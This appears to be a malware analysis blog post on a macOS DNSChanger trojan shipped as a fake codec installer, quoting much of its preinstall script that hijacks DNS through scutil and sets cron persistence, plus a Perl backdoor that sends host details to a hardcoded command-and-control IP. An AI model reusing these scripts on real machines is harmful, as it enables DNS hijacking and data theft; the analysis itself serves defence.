::::::::::::
DMG : ~ 17.1 KB (17,598 bytes)
Installer.pkg : ~132 KB (135,168 bytes)
:::::::::::::::::
::::::::::::::::::::::::::::::::::

The disk image file will be automatically mounted but not extracted. This means, the user has to manually install the downloaded file.
Info.plist is the first file invoked during the installation. This file contains detailed usage information and behavior such as:
Brief description: Microsoft Company
Application Type: MacVideo
Release Version: 1.0
Authorization Action: RootAuthorization
Default Location: /Library/Internet Plug-Ins/
Installed Size: 60
Restart Action: NoRestart
Followed by Archive.bom, which contain information of files to install.
.
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak
./Mozillaplug.plugin/Contents/version.plist
./QuickTime.xpt
./plugins.settings
./sendreq
It then access the files description.plist and PkgInfo, which gives the following information:
Version: 1.0
Description: “Its a suppa puppa desc yo”
Title: MacCodec
PkgInfo: pmkrpkg1
Followed by BundleVersions.plist for version informations.
The installer comes with a “License Agreement”. Upon clicking “Continue”, a message box will display requiring the user to click “Agree” to continue the installation process.
Ok, let’s look further on the malicious codes.
Postinstall and postupgrade contains exactly the same code, as well as preinstall and preupgrade.
Preinstall is invoked after the user agreed on the License Agreement. This trojan does not have damaging payloads, except it only modifies users’ DNS setting. Let’s check the code.
:::::::::::::::::::::::
Preinstall script:
s1=85.255.115.22
s2=85.255.112.190
path=”/Library/Internet Plug-Ins”
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e ‘s/.*PrimaryService : //’)<
Using Scutil, it retrieves user’s primary network interface.
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)
It then modifies DNS name server IP to s1=85.255.115.22 and s2=85.255.112.190.
/usr/sbin/scutil
open
d.init
d.add ServerAddresses * $s1 $s2
set State:/Network/Service/$PSID/DNS
quit
**Take note: IP addresses may change per variant.
It checks for a crontab file – plugins.settings, in this location “/Library/Internet Plug-Ins”. This file is a marker, it indicates whether this trojan has been previously installed or not.
exist=`crontab -l|grep plugins.settings`
If plugins.settings does not exist (meaning, it was not yet installed), the installation will proceed by dropping a temporary file \cron.inst
echo “* * * * * \”$path/plugins.settings\”>/dev/null 2>&1″ > cron.inst
Cron.inst has the following strings:
It will execute cron.inst using Crontab command.
crontab cron.inst
Cron.inst executes another script, Quicktime.xpt. This is found in this location /Library/Internet Plug-Ins/
“/Library/Internet Plug-Ins/QuickTime.xpt”
In background, it will create a temporary file named, 1.
>/dev/null 2>&1
QuickTime.xpt redirects its output to this file instead of popping error or script command to the user’s screen.
Once cron.inst is executed, preinstall script will delete this temporary file.
rm -rf cron.inst
fi
QuickTime.xpt script:
This script is inside Archive.pax.gz. The installation ends by executing cron.inst, which extracts its content to this location /Library/Internet Plug-Ins/.
Like preinstall script, QuickTime.xpt checks for users network information, attempt to modify DNS name server settings, checks the existence of QuickTime.xpt and if exist, it creates cron.inst, execute it and delete temporary file, 1.
Postinstall script:
#!/bin/sh
path=”/Library/Internet Plug-Ins/”
/usr/bin/perl “$path/sendreq”
rm -rf “$path/sendreq”
It executes sendreq, which is a perl script and deletes it.
SendReq Script:
This perl base bot acts as a backdoor client component and communicates to a remote server through socket.
#!/usr/bin/perl
use IO::Socket;
It uses MIME base64 encoding to transmit messages through HTTP.
my $eol = $_[1];
$eol = “\n” unless defined $eol;my $res = pack(“u”, $_[0]);
# Remove first character of each line, remove newlines
$res =~ s/^.//mg;
$res =~ s/\n//g;
$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 – length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/’=’ x $padding/e if $padding;
# break encoded string into lines of no more than 76 characters each
if (length $eol) {
$res =~ s/(.{1,76})/$1$eol/g;
}
return $res;
}
The bot command-and-control server:
my $server=”85.255.121.37″;
**Take note: IP addresses may change per variant.
Executes uname -p command to retrieve victim’s operating system processor type and hostname for the IP address.
my $cmd=’uname -p;echo “;”;hostname’;$cmd=~s/\n//g;
Encode the gathered information, indicating “mac”.
Send a request to remote server.
This bot sends a request to the remote server, attempting to establish a connection through TCP port 80.
print $socket $request;
close($socket);
Captured packet looks like this:
It sends victim’s information in base64 encoded strings:
Decoded version:
Furthermore, later versions of this trojan scripts are obfuscated making it little difficult for security analyst and researchers to read the code.
::::::::::::::::
Trojan DNSChanger is as simple as changing DNS settings – no complication and no destructive behavior. These are simple scripts that are widely available online, built into mac installer and deployed to several existing fake codec domains.The lesson here is that malwares or threats in Mac does not have to be complicated. With the vast information available online, it is possible that an ordinary person without programming background – also called script kiddie, can cause interruption and damage to our daily lives.